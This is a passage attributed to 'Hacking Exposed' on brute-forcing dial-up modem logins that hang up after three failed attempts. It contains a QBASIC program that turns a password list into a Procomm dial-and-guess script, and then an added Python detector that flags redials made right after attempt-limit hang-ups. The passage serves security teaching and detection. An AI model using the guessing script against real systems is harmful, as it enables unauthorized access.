Domain2

Brute Force Domain 2: Single Authentication, Limited Attempts 
(Excerpts from Hacking Exposed written by Stephan Barnes  "M4phr1k")

Our second domain takes, in theory, the next longest amount of time to attempt to penetrate, because an additional component has to be added to the script.  Using the examples shown so far, let's review a 2nd domain result in (FIG 4).  You will notice a slight difference from our true 1st domain example: in this example, after three attempts the ATH0 appears.  This is the typical Hayes modem command for Hang Up, which means that this particular connection hangs up after 3 attempts.  It could be 4, 5 or 6 or some other number, but the point demonstrated here is that you now know how to dial the connection back up after X (3 in this example) attempts.  The solution is to add some code to our existing example, as shown in (FIG 5).  Essentially this means doing the password guess 3 times and then redialing the connection and starting the process over.

(FIG 4)

XX-Jul-XX 03:45:08 91XXX5551235 C: CONNECT 9600/ARQ/V32/LAPM

Enter Password:
Invalid Password.

Enter Password:
Invalid Password.

Enter Password:
Invalid Password.
ATH0

(Note the important characteristic: the ATH0, which is the typical Hayes modem hang-up command.)

(FIG 5)

Example QBASIC program (called 5551235.BAS)

' Generates the Procomm Plus ASPECT script 5551235.was from LIST.txt (one password guess per line).
' Because the far end hangs up (ATH0) after three attempts, a fresh "dial" is emitted before every group of three guesses.
OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
DO UNTIL EOF(1)
' Redial at the start of each group of three guesses
PRINT #2, "dial DATA " + CHR$(34) + "5551235" + CHR$(34)
LINE INPUT #1, in$
in$ = LTRIM$(in$) + "^M"
PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
IF EOF(1) THEN EXIT DO    ' LIST.txt need not hold a multiple of three lines; avoid "Input past end of file"
LINE INPUT #1, in$
in$ = LTRIM$(in$) + "^M"
PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
IF EOF(1) THEN EXIT DO
LINE INPUT #1, in$
in$ = LTRIM$(in$) + "^M"
PRINT #2, "waitfor " + CHR$(34) + "Enter Password:" + CHR$(34)
PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
LOOP
PRINT #2, "endproc"
CLOSE #1, #2
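From the defending side, the redial-after-hang-up pattern that the script above produces is itself a signature: the same number is dropped at the attempt limit and reconnected again seconds later. The following is an added example, not from the book, that parses a capture log in the FIG 4 format and flags that pattern; the log lines, the attempt limit of 3 and the 10-minute redial window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed capture in the FIG 4 format (prompt lines omitted; the parser keys only on
# CONNECT, "Invalid Password." and ATH0): two quick redials of one number, each dropped
# after three failures, and one ordinary login to a different number.
SAMPLE_LOG = """\
17-Jul-99 03:45:08 9155551235 C: CONNECT 9600/ARQ/V32/LAPM
Invalid Password.
Invalid Password.
Invalid Password.
ATH0
17-Jul-99 03:46:02 9155551235 C: CONNECT 9600/ARQ/V32/LAPM
Invalid Password.
Invalid Password.
Invalid Password.
ATH0
17-Jul-99 04:10:00 9155551299 C: CONNECT 2400
Invalid Password.
Password accepted.
"""
CONNECT_RE = re.compile(r"^(\S+ \S+) (\d+) C: CONNECT")
LOG_TIME = "%d-%b-%y %H:%M:%S"

def parse_sessions(text):
    """Split a capture into dial sessions: time, dialed number, failure count, hang-up seen."""
    sessions = []
    for line in text.splitlines():
        m = CONNECT_RE.match(line)
        if m:
            sessions.append({"time": datetime.strptime(m.group(1), LOG_TIME),
                             "number": m.group(2), "failures": 0, "ath0": False})
        elif sessions and line.strip() == "Invalid Password.":
            sessions[-1]["failures"] += 1
        elif sessions and line.strip() == "ATH0":
            sessions[-1]["ath0"] = True
    return sessions

def find_redial_bruteforce(text, limit=3, window=timedelta(minutes=10)):
    """Flag numbers that were hung up at the attempt limit and then redialed within `window`."""
    locked = {}
    for s in parse_sessions(text):
        if s["failures"] >= limit and s["ath0"]:
            locked.setdefault(s["number"], []).append(s["time"])
    flagged = {}
    for number, times in locked.items():
        times.sort()
        quick = sum(1 for a, b in zip(times, times[1:]) if b - a <= window)
        if quick:
            flagged[number] = {"locked_sessions": len(times), "quick_redials": quick}
    return flagged
```

A single session that reaches the limit is not reported on its own; only the hang-up followed by a fast reconnect is, which is what separates the scripted guessing from a user mistyping a password.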